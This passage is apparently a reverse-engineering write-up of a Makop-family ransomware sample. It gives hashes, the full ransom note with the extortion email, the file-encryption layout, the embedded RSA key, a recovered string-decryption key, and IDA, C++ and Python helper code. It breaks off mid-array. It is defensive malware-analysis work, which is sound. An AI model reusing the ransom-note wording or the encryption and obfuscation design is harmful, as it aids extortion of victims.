【Malware Analysis】Dissecting the .mkp ransomware: how a Makop family variant encrypts through a GUI

Time: 2024-11-22 00:31:14

1. Background

1.1 The Makop family

  Makop ransomware first appeared in January 2020, promoted by a user named "Makop" on several dark-web forums (Exploit, XSS, Blackhacker, WWH-Club, Dublikat, Migalki, Tenec and Rutor). That user launched a Makop ransomware-as-a-service (RaaS) program and actively recruited partners to distribute and expand it.

1.2 First seen

  January 2020

1.3 Encryptor characteristics

  The Makop encryptor has an unusual design: it ships with a graphical user interface (GUI), and some of these GUI samples were identified on VirusTotal by the Stroz Friedberg team. At run time the encryptor decrypts its strings dynamically, which makes static analysis harder. The decrypted content includes library names, API names, strings used at run time, and the ransom note text.

  With the GUI build, the operator can pick a specific folder or the whole system to encrypt. The encryptor generates an 8-character system-specific ID and appends it to the name of each encrypted file. The ID is derived from the Windows product ID and the volume serial number.

  The encryptor GUI offers the following options:

   Quick: encrypts only the first 40K bytes of each target file to speed up the run. (Note that the file-format analysis of this sample in section 3.3.2 observes a partial-encryption threshold of 0x40000 bytes, i.e. 256 KB.)

   Net: also encrypts network shares.

   Delete: deletes the encryptor itself.

2. Basic information on the malicious file

2.1 Encryptor basics

File name: mkp_visual.exe
Compiler: Microsoft Visual C/C++ (14.00.50727) LTCG/C++
Size: 89.50 KB
Operating system: Windows(95) (minimum version reported by the PE subsystem fields)
Architecture: I386
Mode: 32-bit
Type: GUI
Endianness: LE
MD5: d24ad02799acc28d3e93b2f2389289c6
SHA1: da837c7f6048bd97d872acec9b51d8c9781cd293
SHA256: f3d6caac373fe93c5b0e688d44f17f2eac9f782f3bd26702ca54ab15538317c6

2.2 Ransom note

   +README-WARNING+.txt

::: Greetings :::

Little FAQ:

.1. 
Q: Whats Happen?
A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen.

.2. 
Q: How to recover files?
A: If you wish to decrypt your files you will need to pay us.

.3. 
Q: What about guarantees?
A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests.
To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.

.4.
Q: How to contact with you?
A: You can write us to our mailbox: sspdlk00036@cock.li

.5.
Q: How will the decryption process proceed after payment?
A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files.

.6.
Q: If I don't want to pay bad people like you?
A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money.



:::BEWARE:::
DON'T try to change encrypted files by yourself! 
If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files!
Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.

3. Analysis of the encrypted files

3.1 Threat summary

Family: Makop
First seen / captured and analyzed: 2024/11/01 / 2024/11/04
Threat type: ransomware, file-encrypting malware
Encrypted file extension: .sspdlk00036@cock.li.mkp
Ransom note file name: +README-WARNING+.txt
Free decryptor available: unknown
Contact email: sspdlk00036@cock.li
Detection names: Avast (Win32:Malware-gen), AhnLab-V3 (Trojan/Win.Generic.C5576951), ALYac (Gen:Variant.Tedy.512515), Avira (no cloud) (TR/Ransom.imrnt), BitDefenderTheta (Gen:NN.ZexaF.36802.yq0@aSdxC8m), CrowdStrike Falcon (Win/malicious_confidence_100% (W)), Cylance (Unsafe), DeepInstinct (MALICIOUS), Emsisoft (Gen:Variant.Tedy.512515 (B)), ESET-NOD32 (A Variant Of MSIL/Filecoder.LU), GData (Gen:Variant.Tedy.512515), Ikarus (Trojan.MSIL.Crypt), K7GW (Trojan ( 0052f4e41 )). Treat these as vendor labels only: the ESET-NOD32 and Ikarus names say MSIL (.NET), which does not match the native Visual C++ binary described in section 2.1.
Symptoms: files stored on the computer can no longer be opened; files that previously worked now carry a different extension (generic example: solar.docx.locked; for this sample: name.sspdlk00036@cock.li.mkp). A ransom message is displayed on the desktop, and the criminals demand payment (usually in Bitcoin) to unlock the files.
Infection vectors: infected email attachments (macros), malvertising, exploits, malicious links
Impact: all files are encrypted and cannot be opened without paying the ransom. Additional password-stealing trojans and other malware may be installed alongside the ransomware.

3.2 Encrypted test file

3.2.1 File name

   sierting.txt

3.2.2 File size

   0x228 bytes

3.2.3 Contents

3.3 Encryption characteristics

3.3.1 Encrypted file name

  Encrypted file name = original file name + encryption suffix, e.g. sierting.txt.sspdlk00036@cock.li.mkp

3.3.2 Encrypted data layout

   File size <= 0x40000 bytes (full encryption):

   encrypted original data + 0 to 16 bytes of variable-length padding + 8 bytes of \xff + encrypted filename structure (variable length) + 4-byte length of that encrypted filename structure + 16-byte IV + 128-byte RSA-encrypted AES key + 4-byte fixed value + 4-byte encryption flag

  File size > 0x40000 bytes (partial encryption):

   0x40000 bytes of encrypted data + the remaining original data (left untouched) + encrypted filename structure (variable length) + 4-byte length of that encrypted filename structure + 16-byte IV + 128-byte RSA-encrypted AES key + 4-byte fixed value + 4-byte encryption flag

  Two things to keep in mind when triaging files: 0x40000 bytes is 256 KB, so anything larger keeps its tail in clear and only the first 256 KB is lost; and the 128-byte key field is exactly one RSA-1024 ciphertext, which matches the 1024-bit public key embedded in the sample (section 3.3.3.2).
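As an added example (not code from the original post), the following Python parser walks an encrypted file from its end and splits it into the fields listed above. It builds its own placeholder files in that layout so it runs offline: the "ciphertext" is filler, no AES or RSA is performed, and the field names as well as the use of the 8 x 0xff marker (plus a size bound) to tell full from partial encryption are this example's assumptions based on the layout described.

```python
import struct

# Field sizes from the layout above (all trailing fields, read from the end of the file).
FLAG_LEN = 4            # encryption flag
FIXED_LEN = 4           # fixed value
WRAPPED_KEY_LEN = 128   # RSA-encrypted AES key (128 bytes = one RSA-1024 ciphertext)
IV_LEN = 16             # AES-CBC IV
NAME_LEN_FIELD = 4      # length of the encrypted filename structure
TAIL_LEN = FLAG_LEN + FIXED_LEN + WRAPPED_KEY_LEN + IV_LEN + NAME_LEN_FIELD   # 156
PARTIAL_LIMIT = 0x40000      # only this many leading bytes are encrypted for larger files
FULL_MARKER = b"\xff" * 8    # follows the padded ciphertext in full-encryption mode


def parse_mkp_footer(blob: bytes) -> dict:
    """Split an encrypted file into the fields of section 3.3.2, walking backwards from the end."""
    if len(blob) < TAIL_LEN:
        raise ValueError("file too short to carry the trailer")
    flag = blob[-FLAG_LEN:]
    fixed = blob[-8:-4]
    wrapped_key = blob[-8 - WRAPPED_KEY_LEN:-8]
    iv = blob[-TAIL_LEN + NAME_LEN_FIELD:-8 - WRAPPED_KEY_LEN]
    name_len = struct.unpack("<I", blob[-TAIL_LEN:-TAIL_LEN + NAME_LEN_FIELD])[0]
    if name_len > len(blob) - TAIL_LEN:
        raise ValueError("filename-structure length runs past the start of the file")
    body_end = len(blob) - TAIL_LEN - name_len
    name_struct = blob[body_end:body_end + name_len]
    body = blob[:body_end]
    # Assumption: the 8 x 0xff marker exists only in full-encryption mode. A partially
    # encrypted file whose untouched tail happens to end in eight 0xff bytes would be
    # misjudged, so the size is checked too: a full-mode body never exceeds
    # 0x40000 (data) + 16 (padding) + 8 (marker) bytes.
    if body.endswith(FULL_MARKER) and len(body) <= PARTIAL_LIMIT + 16 + len(FULL_MARKER):
        mode, ciphertext, plaintext_tail = "full", body[:-len(FULL_MARKER)], b""
    else:
        mode, ciphertext, plaintext_tail = "partial", body[:PARTIAL_LIMIT], body[PARTIAL_LIMIT:]
    return {"mode": mode, "ciphertext": ciphertext, "plaintext_tail": plaintext_tail,
            "name_struct": name_struct, "iv": iv, "wrapped_key": wrapped_key,
            "fixed": fixed, "flag": flag}


def build_sample(mode: str, original: bytes, name_struct: bytes, iv: bytes,
                 wrapped_key: bytes, fixed: bytes, flag: bytes) -> bytes:
    """Constructed test input laid out as in section 3.3.2. Nothing here is encrypted; the
    bytes only have the shape of an encrypted file so the parser can be exercised offline."""
    assert len(iv) == IV_LEN and len(wrapped_key) == WRAPPED_KEY_LEN
    assert len(fixed) == FIXED_LEN and len(flag) == FLAG_LEN
    if mode == "full":
        assert len(original) <= PARTIAL_LIMIT
        pad = 16 - len(original) % 16            # 1..16 bytes, as block-cipher padding adds
        body = original + b"\x00" * pad + FULL_MARKER
    else:
        assert len(original) > PARTIAL_LIMIT
        body = original                           # first 0x40000 "encrypted", remainder untouched
    trailer = name_struct + struct.pack("<I", len(name_struct)) + iv + wrapped_key + fixed + flag
    return body + trailer


if __name__ == "__main__":
    # A 0x228-byte file, the size of the page's sierting.txt test file.
    sample = build_sample("full", b"A" * 0x228, b"N" * 37, bytes(range(16)), bytes(128),
                          b"\x01\x02\x03\x04", b"\xaa\xbb\xcc\xdd")
    info = parse_mkp_footer(sample)
    print(info["mode"], hex(len(info["ciphertext"])), info["iv"].hex(), info["flag"].hex())
```

Run it against a real .mkp file by passing the file's bytes to parse_mkp_footer; the returned "wrapped_key" is what would have to go to the RSA private key holder, and "plaintext_tail" is the part of a large file that can be salvaged without any key.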

3.3.3 Encryption algorithms

  Files are encrypted with AES in CBC mode; the per-file AES key is itself encrypted with RSA (the 1024-bit public key embedded in the sample, section 3.3.3.2) and stored in the file trailer.

  The program's embedded strings are decrypted with AES in ECB mode.

3.3.3.1 AES key generation

KEY

  Generated by the produce_random_key function (see the key-generation part of the reverse analysis for the full routine).

  The KEY is a 32-byte random value, and the random number generator is CryptGenRandom.

IV

  Generated by the produce_random function during file encryption (see the file-encryption part of the reverse analysis).

  The IV is a 16-byte random value, also from CryptGenRandom.

  Because both values come from the system CSPRNG and only the RSA-encrypted copy of the key is kept in the file, there is nothing to brute-force on the victim side: recovery without the operators' RSA private key is not possible, which is what the note means by "only we have the private key".

3.3.3.2 RSA key

Public key

  Obtained by decrypting string index 0xa. It is already in CryptoAPI key BLOB form (PUBLICKEYBLOB header, CALG_RSA_KEYX, "RSA1" magic, 1024-bit modulus, public exponent 65537), followed by a few zero bytes:

0602000000a400005253413100040000010001001d35622bcfbcfe4fde59eae15c05d7528d0c1ae6755c180904dd745cd1f5a19986fce1e0e9534595e4fb7bdd6d5cc1f2cee684851bfc59529108c433185cf76c800f421aad345aa6a964e8f485acf1d3965c85654b124257e0142269eab809af68692309843ce7cd4fa8bf3124926f0403a7502abbecfa2ba7504e63a958e7bd000000000000000000000000
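The BLOB above can be decoded without Windows. The following Python, added here as an example and not part of the original post, parses the CryptoAPI PUBLICKEYBLOB header and the RSAPUBKEY structure, extracts the little-endian modulus, and re-encodes the key as a PKCS#1 PEM so it can be inspected with standard tooling. The function names are this example's own; the blob bytes are copied from the page.

```python
import base64
import struct

# Public key BLOB as decrypted from string index 0xa (copied from the analysis above).
BLOB_HEX = (
    "0602000000a400005253413100040000010001001d35622bcfbcfe4fde59eae15c05d7528d0c1ae6"
    "755c180904dd745cd1f5a19986fce1e0e9534595e4fb7bdd6d5cc1f2cee684851bfc59529108c433"
    "185cf76c800f421aad345aa6a964e8f485acf1d3965c85654b124257e0142269eab809af68692309"
    "843ce7cd4fa8bf3124926f0403a7502abbecfa2ba7504e63a958e7bd000000000000000000000000"
)

PUBLICKEYBLOB = 0x06
CUR_BLOB_VERSION = 0x02
CALG_RSA_KEYX = 0x0000A400
RSA1_MAGIC = 0x31415352          # the ASCII bytes "RSA1" read as a little-endian DWORD


def parse_rsa_publickeyblob(blob: bytes) -> dict:
    """Decode BLOBHEADER + RSAPUBKEY + little-endian modulus (CryptoAPI PUBLICKEYBLOB layout)."""
    b_type, b_version, _reserved, alg = struct.unpack_from("<BBHI", blob, 0)
    magic, bit_len, pub_exp = struct.unpack_from("<III", blob, 8)
    if b_type != PUBLICKEYBLOB or b_version != CUR_BLOB_VERSION or magic != RSA1_MAGIC:
        raise ValueError("not a CryptoAPI RSA public key BLOB")
    n_len = bit_len // 8
    modulus_le = blob[20:20 + n_len]
    if len(modulus_le) != n_len:
        raise ValueError("BLOB truncated: modulus shorter than the declared bit length")
    return {
        "alg": alg,                                  # 0xA400 = CALG_RSA_KEYX (key exchange / encryption)
        "bits": bit_len,
        "e": pub_exp,
        "n": int.from_bytes(modulus_le, "little"),   # CryptoAPI stores the modulus little-endian
        "trailing": blob[20 + n_len:],               # bytes past the structure (here 12 zero bytes)
    }


def _der_len(length: int) -> bytes:
    if length < 0x80:
        return bytes([length])
    enc = length.to_bytes((length.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(enc)]) + enc


def _der_int(value: int) -> bytes:
    enc = value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")
    if enc[0] & 0x80:                 # keep the INTEGER positive
        enc = b"\x00" + enc
    return b"\x02" + _der_len(len(enc)) + enc


def rsa_public_key_pem(n: int, e: int) -> str:
    """PKCS#1 RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }, PEM-armored."""
    body = _der_int(n) + _der_int(e)
    der = b"\x30" + _der_len(len(body)) + body
    b64 = base64.b64encode(der).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN RSA PUBLIC KEY-----\n" + "\n".join(lines) + "\n-----END RSA PUBLIC KEY-----\n"


if __name__ == "__main__":
    key = parse_rsa_publickeyblob(bytes.fromhex(BLOB_HEX))
    print(f"alg=0x{key['alg']:x} bits={key['bits']} e={key['e']} "
          f"n.bit_length()={key['n'].bit_length()}")
    print(rsa_public_key_pem(key["n"], key["e"]))
```

A 1024-bit modulus means every RSA-wrapped AES key in the file trailer is exactly 128 bytes, which is the field size given in section 3.3.2. Write the PEM to a file and inspect it with `openssl rsa -RSAPublicKey_in -in key.pem -text -noout`; the matching private key is, of course, not present in the sample.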

3.3.4 Files dropped by the encryptor

3.3.4.1 Ransom note (+README-WARNING+.txt)

File contents

  Identical to the note reproduced in section 2.2 above.

Composition

   The entire ransom note is obtained by decrypting string index 0x8; it does not depend on the victim ID in any way.

3.3.4.2 Ransom wallpaper (xxx.tmp.bmp)

File contents

Composition

  The string "Your files were encrypted!" is obtained by decrypting string index 0x3a and drawn onto a canvas of fixed size to produce the bitmap.

4. Reverse engineering

4.1 The encryptor

4.1.1 Program entry

  At start-up the program first calls sub_407A90 to check the privileges of the executing user, then sub_4077D0 to validate the command-line arguments, then init_enc_obj to initialize the encryption objects and decrypt part of the strings. It then checks whether it is running as administrator and whether the arguments are valid; if either check fails, it exits.

  Once these checks pass, it calls Init_GUI to display the program window and dispatches the events the operator triggers from it.

4.1.2 Privilege check (sub_407A90)

  A fairly conventional administrator check.

4.1.3 Argument check (sub_4077D0)

  Checks the launch arguments and returns a fixed value depending on whether an argument is present and what it contains:

   Return value 0: no argument

   Return value 1: the argument is "e"

   Return value 2: the argument is "n" followed by a string of digits

4.1.4 String decryption (sub_402950)

4.1.4.1 Logic

  This is the first algorithm encountered in the program. Pick any call site and the pattern is the same: every string decryption is driven by an index flag, and each flag corresponds to one string. The same arrangement is one of the classic tricks of the Phobos family as well.

  Across the Phobos variants analyzed earlier, the string decryption differs from version to version. The variant analyzed here (a Makop sample, not Phobos) still decrypts with AES-256 in ECB mode, clearly in the malware author's own wrapper code; inside the function, the key BLOB passed to the import call tells you the exact cipher and key size.

  Starting from the call sites, the familiar offset-flag lookup is used: the flag selects the length and the ciphertext location of the string.

  Inside the function the key is set up first. CryptAcquireContextW initializes the provider with type 0x18, i.e. PROV_RSA_AES, and CryptImportKey then imports the key. The key is passed as a BLOB structure, whose header (aiKeyAlg) identifies the algorithm; here it is an AES-256 PLAINTEXTKEYBLOB carrying the 32-byte key below. One caveat when reproducing the routine: CryptoAPI block-cipher keys default to CBC mode after import, so for the ECB decryption described here the sample has to set KP_MODE to CRYPT_MODE_ECB through CryptSetKeyParam; look for that call when you rebuild the decryptor.

  AES key (string decryption):

8C93C36117EE77655080C789D0B92C73C91F1FDA560942CA72AA3DB5AC4CACB1

  With the key imported, the ciphertext can be decrypted.

  The following IDA Python script extracts every ciphertext entry together with its index flag:

# IDA Python: dump the string table used by sub_402950.
# Each 8-byte entry at 0x41F000 holds: +0 index flag (BYTE), +2 start offset (WORD),
# +4 end offset (WORD); the offsets are relative to the table base.
# read_dbg_* reads debugger memory, so run this while the process is suspended under
# the debugger (use idc.get_wide_byte / idc.get_wide_word for a static analysis instead).
import idc

TABLE_BASE = 0x41F000
ENTRY_COUNT = 0x2d

sum_cipher = []
for i in range(ENTRY_COUNT):
    entry = TABLE_BASE + 8 * i
    flag = idc.read_dbg_byte(entry)
    start = idc.read_dbg_word(entry + 2)
    end = idc.read_dbg_word(entry + 4)
    # Ciphertext bytes live at table base + start offset, (end - start) bytes long.
    cipher = [idc.read_dbg_byte(TABLE_BASE + start + k) for k in range(end - start)]
    sum_cipher.append(cipher)
    print(hex(flag), cipher)
    print('-' * 100)

  After arranging the dumped data (starting from flag 0), a C++ program decrypts it:

#include <windows.h>
#include <wincrypt.h>
#include <cstring>
#include <iostream>
#include <vector>
#include <sstream>
#include <iomanip>

// Print a byte vector as lowercase hex (used for the decrypted plaintext).
void PrintHex(const std::vector<BYTE>& data) {
    std::cout << "Hex: ";
    for (BYTE b : data) {
        std::cout << std::hex << std::setw(2) << std::setfill('0') << (int)b;
    }
    std::cout << std::endl;
}

int main() {
    HCRYPTPROV hProv = NULL;
    HCRYPTKEY hKey = NULL;
    // Same provider type the sample requests: 0x18 == PROV_RSA_AES.
    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        std::cout << "Failed to acquire crypto context!" << std::endl;
        return 1;
    }
    // AES-256 key recovered from the sample's string-decryption routine (see above).
    unsigned char key[32] = {
        0x8C, 0x93, 0xC3, 0x61, 0x17, 0xEE, 0x77, 0x65, 0x50, 0x80,
        0xC7, 0x89, 0xD0, 0xB9, 0x2C, 0x73, 0xC9, 0x1F, 0x1F, 0xDA,
        0x56, 0x09, 0x42, 0xCA, 0x72, 0xAA, 0x3D, 0xB5, 0xAC, 0x4C,
        0xAC, 0xB1
    };
    // PLAINTEXTKEYBLOB: BLOBHEADER, DWORD key length, raw key bytes. The aiKeyAlg field is
    // what identifies the cipher (CALG_AES_256) when the same structure shows up in the sample.
    struct {
        BLOBHEADER hdr;
        DWORD keySize;
        BYTE keyData[32];
    } keyBlob;
    keyBlob.hdr.bType = PLAINTEXTKEYBLOB;
    keyBlob.hdr.bVersion = CUR_BLOB_VERSION;
    keyBlob.hdr.reserved = 0;
    keyBlob.hdr.aiKeyAlg = CALG_AES_256;
    keyBlob.keySize = 32;
    memcpy(keyBlob.keyData, key, 32);
    // NOTE: after CryptImportKey(hProv, (BYTE*)&keyBlob, sizeof(keyBlob), 0, 0, &hKey) the
    // key defaults to CBC mode in CryptoAPI. For the ECB scheme the sample uses, set
    //   DWORD mode = CRYPT_MODE_ECB; CryptSetKeyParam(hKey, KP_MODE, (BYTE*)&mode, 0);
    // before calling CryptDecrypt, or the output will be garbage.
    // Index flags of the table entries, in the same order as the ciphertexts listed below.
    std::vector<std::string> sign_list = { "0x0", "0x1", "0x4", "0x5", "0x6", "0x7", "0x8", "0x9", "0xa", "0xc", "0xe", "0xf", "0x10", "0x11", "0x12", "0x13", "0x14", "0x16", "0x17", "0x18", "0x19", "0x1a", "0x1b", "0x1e", "0x1f", "0x20", "0x21", "0x22", "0x23", "0x24", "0x25", "0x26", "0x27", "0x28", "0x29", "0x2a", "0x2b", "0x2c", "0x33", "0x36", "0x37", "0x38", "0x39" ,"0x3a"};
    std::vector<std::vector<BYTE>> cipher_list = { 
        {84, 193, 164, 131, 219, 130, 47, 108, 192, 20, 48, 116, 31, 202, 206, 31, 45, 132, 42, 178, 65, 215, 203, 28, 93, 184, 43, 117, 78, 237, 248, 206}, {205, 64, 217, 196, 63, 9, 44, 9, 32, 203, 49, 156, 87, 2, 229, 192, 14, 183, 145, 174, 109, 239, 47, 175, 41, 89, 206, 231, 223, 102, 191, 13, 255, 204, 188, 186, 210, 176, 6, 8, 110, 232, 254, 109, 118, 217, 78, 57, 158, 125, 43, 169, 138, 255, 110, 33, 149, 64, 176, 49, 153, 106, 79, 208}, 
        {115, 228, 119, 26, 133, 194, 217, 50, 140, 71, 43, 242, 116, 74, 143, 37, 208, 175, 234, 92, 156, 221, 229, 239, 183, 235, 157, 27, 197, 252, 116, 193, 129, 8, 105, 72, 249, 190, 174, 42, 85, 197, 181, 37, 184, 148, 156, 79, 16, 180, 57, 73, 69, 57, 244, 223, 183, 5, 172, 121, 226, 104, 8, 207, 104, 149, 188, 150, 207, 173, 233, 11, 182, 16, 16, 96, 226, 157, 113, 183, 191, 75, 238, 170, 44, 115, 0, 215, 213, 227, 94, 153, 62, 19, 15, 245, 102, 108, 148, 54, 79, 141, 48, 109, 69, 25, 169, 99, 210, 62, 139, 58, 52, 38, 195, 4, 125, 77, 253, 132, 136, 83, 163, 202, 174, 61, 177, 136, 170, 162, 186, 37, 195, 209, 93, 172, 38, 223, 26, 194, 101, 55, 249, 168, 208, 58, 190, 123, 56, 115, 1, 227, 50, 223, 107, 220, 31, 168, 173, 133, 171, 179, 82, 15, 10, 127, 251, 173, 187, 49, 213, 191, 149, 201, 93, 54, 187, 124, 207, 180, 186, 26, 55, 212, 102, 29, 97, 215, 76, 198, 188, 17},
        {222, 55, 116, 106, 205, 240, 172, 80, 144, 36, 154, 125, 243, 40, 137, 67, 242, 106, 3, 192, 230, 18, 88, 45, 138, 203, 130, 141, 255, 206, 44, 196, 102, 200, 233, 123, 44, 15, 163, 29, 159, 34, 139, 36, 233, 181, 55, 138, 73, 231, 255, 89, 123, 127, 226, 171, 187, 66, 102, 214, 42, 138, 31, 146, 24, 220, 180, 89, 206, 36, 47, 58, 169, 128, 102, 212, 139, 165, 184, 246, 242, 203, 51, 33, 247, 235, 206, 147, 165, 134, 240, 14, 97, 152, 221, 55, 72, 204, 140, 107, 155, 57, 33, 147, 169, 23, 61, 86, 34, 160, 138, 160, 53, 122, 51, 154, 19, 108, 152, 195, 74, 243, 64, 81, 231, 96, 235, 61, 222, 207, 140, 216, 39, 79, 16, 124, 117, 85, 195, 237, 174, 50, 49, 169, 21, 157, 216, 39, 175, 185, 87, 175, 185, 78, 225, 68, 131, 211, 161, 5, 199, 178, 175, 110, 57, 43, 202, 237, 8, 38, 229, 175, 240, 221, 234, 22, 113, 33, 159, 75, 206, 161, 164, 199, 129, 6, 15, 146, 198, 218, 102, 66, 238, 102, 84, 67, 21, 62, 5, 74, 189, 47, 246, 126, 25, 197, 166, 136, 150, 180, 237, 145, 15, 14, 81, 83, 28, 131, 178, 6, 116, 71, 129, 10, 48, 74, 174, 74, 179, 248, 134, 41, 225, 100, 161, 133, 65, 16, 176, 249, 209, 89, 212, 4, 73, 131, 128, 140, 185, 190, 80, 204, 214, 41, 183, 208, 61, 130, 53, 115, 177, 246, 27, 174, 13, 127, 218, 158, 42, 63, 201, 237, 22, 201, 231, 92, 9, 151, 180, 165, 113, 66, 57, 4, 153, 102, 56, 239, 24, 136, 195, 251, 23, 99, 99, 112, 139, 221, 39, 9, 225, 168, 220, 107, 210, 95, 127, 83, 6, 156, 124, 60, 246, 100, 54, 194, 110, 59, 227, 65, 232, 39, 119, 177, 195, 89, 172, 148, 229, 131, 92, 47, 52, 169, 2, 77, 223, 179, 233, 41, 21, 204, 0, 85, 160, 103, 243, 112, 213, 70, 174, 248, 255, 28, 176, 17, 114, 204, 152, 97, 250, 181, 127, 84, 49, 236, 52, 4, 207, 141, 234, 22, 20, 12, 151, 241, 143, 113, 219, 207, 216, 45, 199, 218, 235, 12, 142, 161, 97, 62, 208, 19, 82, 179, 109, 119, 184, 213, 216, 222, 23, 29, 192, 79, 127, 209, 111, 155, 171, 133, 110, 254, 188, 75, 22, 117, 33, 166, 105, 146, 230, 134, 184, 233, 46, 110, 150, 94, 222, 27, 250, 42, 
141, 230, 24, 173, 165, 11, 46, 80, 101, 140, 74, 190, 118, 157, 133, 133, 111, 69, 211, 96, 83, 148, 160, 230, 148, 96, 104, 79, 204, 164, 9, 119, 33, 189, 150, 180, 206, 83, 201, 149, 17, 111, 15, 19, 130, 169, 253, 16, 178, 47, 242, 181, 203, 111, 250, 156, 212, 177, 157, 44, 44, 228, 76, 61, 203, 146, 68, 127, 156, 10, 0, 121, 113, 32, 254, 96, 115, 249, 208, 239, 251, 146, 179, 26, 6, 99, 22, 46, 255, 175, 121, 42, 5, 223, 234, 145, 115, 201, 199, 155, 76, 76, 244, 5, 39, 97, 249, 52, 71, 52, 23, 235, 255, 187, 194, 0, 52, 239, 14, 158, 34, 206, 51, 255, 167, 208, 121, 36, 70, 7, 147, 100, 122, 46, 105, 219, 244, 212, 77, 137, 205, 241, 61, 23, 247, 184, 247, 16, 22, 238, 176, 33, 171, 13, 250, 131, 18, 28, 189, 226, 86, 219, 21, 90, 99, 238, 212, 7, 58, 7, 225, 187, 159, 115, 67, 136, 87, 111, 131, 46, 99, 209, 80, 45, 64, 163, 104, 40, 29, 84, 238, 36, 150, 1, 18, 5, 10, 69, 160, 220, 38, 216, 237, 232, 225, 18, 246, 104, 39, 54, 58, 83, 88, 109, 61, 228, 77, 188, 14, 206, 25, 15, 172, 135, 69, 24, 75, 85, 42, 17, 109, 132, 235, 52, 113, 5, 222, 33, 38, 241, 229, 76, 235, 221, 227, 52, 0, 196, 130, 239, 73, 130, 254, 70, 102, 230, 145, 84, 94, 76, 190, 140, 220, 34, 113, 202, 141, 77, 141, 80, 161, 94, 111, 124, 118, 63, 124, 91, 211, 45, 178, 205, 64, 159, 155, 157, 30, 69, 242, 141, 225, 107, 207, 122, 56, 221, 96, 69, 168, 56, 131, 176, 30, 69, 95, 78, 38, 139, 48, 203, 14, 133, 166, 61, 8, 86, 217, 70, 158, 73, 153, 172, 52, 13, 210, 249, 252, 106, 119, 245, 87, 4, 247, 198, 35, 138, 162, 251, 164, 201, 40, 13, 33, 27, 101, 114, 228, 167, 182, 62, 47, 79, 36, 18, 116, 237, 159, 181, 244, 147, 7, 77, 228, 144, 171, 236, 249, 110, 237, 118, 67, 84, 8, 141, 11, 40, 122, 163, 163, 111, 88, 221, 251, 133, 158, 159, 139, 119, 109, 119, 223, 212, 2, 112, 152, 253, 133, 245, 209, 62, 203, 255, 24, 91, 4, 123, 104, 212, 253, 13, 164, 58, 48, 233, 37, 14, 201, 209, 177, 47, 59, 162, 223, 210, 15, 119, 86, 69, 174, 151, 201, 55, 45, 5, 142, 252, 215, 79, 25, 187, 
230, 157, 238, 30, 222, 176, 233, 147, 156, 235, 120, 13, 177, 53, 80, 21, 99, 147, 199, 93, 95, 18, 3, 50, 48, 92, 227, 81, 102, 102, 227, 255, 58, 167, 101, 200, 142, 189, 166, 54, 162, 189, 123, 233, 50, 67, 26, 236, 144, 200, 23, 2, 159, 147, 17, 158, 111, 149, 11, 160, 99, 60, 0, 47, 163, 107, 70, 107, 59, 100, 0, 141, 1, 134, 104, 30, 221, 110, 109, 103, 243, 243, 229, 236, 185, 252, 69, 196, 229, 0, 198, 35, 222, 28, 253, 193, 234, 124, 60, 196, 255, 192, 240, 45, 70, 51, 186, 43, 55, 161, 230, 103, 236, 245, 226, 61, 153, 10, 246, 149, 111, 88, 191, 230, 101, 144, 116, 13, 46, 53, 123, 34, 135, 27, 24, 107, 255, 57, 132, 133, 63, 102, 255, 136, 149, 166, 243, 150, 60, 169, 172, 11, 114, 138, 58, 77, 93, 64, 44, 166, 17, 67, 126, 137, 23, 145, 45, 234, 4, 109, 192, 153, 75, 124, 17, 98, 168, 226, 71, 164, 114, 209, 16, 57, 232, 173, 136, 220, 147, 205, 162, 79, 66, 247, 220, 14, 187, 122, 120, 152, 11, 71, 129, 242, 196, 178, 51, 102, 21, 51, 127, 203, 124, 227, 6, 221, 52, 90, 214, 222, 139, 147, 239, 199, 228, 177, 26, 160, 47, 107, 39, 101, 59, 144, 213, 61, 251, 152, 233, 185, 28, 126, 91, 197, 182, 16, 199, 26, 44, 93, 147, 212, 123, 184, 253, 253, 195, 51, 13, 53, 19, 144, 130, 92, 65, 221, 229, 90, 40, 88, 152, 29, 103, 180, 82, 225, 206, 221, 159, 83, 125, 131, 141, 215, 64, 190, 97, 128, 241, 143, 187, 47, 128, 154, 71, 165, 40, 177, 97, 218, 203, 45, 94, 87, 7, 110, 6, 32, 117, 50, 68, 46, 170, 212, 29, 81, 157, 191, 52, 113, 212, 28, 138, 9, 206, 152, 216, 251, 31, 8, 81, 237, 75, 189, 111, 15, 202, 14, 45, 199, 181, 65, 17, 3, 8, 78, 116, 72, 38, 139, 114, 82, 106, 41, 4, 70, 4, 159, 100, 109, 200, 197, 169, 232, 149, 136, 112, 133, 82, 175, 203, 162, 56, 96, 140, 81, 56, 198, 251, 198, 107, 238, 150, 33, 154, 15, 193, 150, 187, 152, 100, 193, 216, 208, 89, 57, 147, 212, 13, 64, 147, 53, 46, 10, 45, 108, 87, 157, 57, 129, 209, 222, 71, 216, 29, 17, 107, 212, 124, 196, 87, 210, 139, 11, 158, 106, 208, 230, 127, 211, 219, 176, 39, 114, 5, 101, 45, 
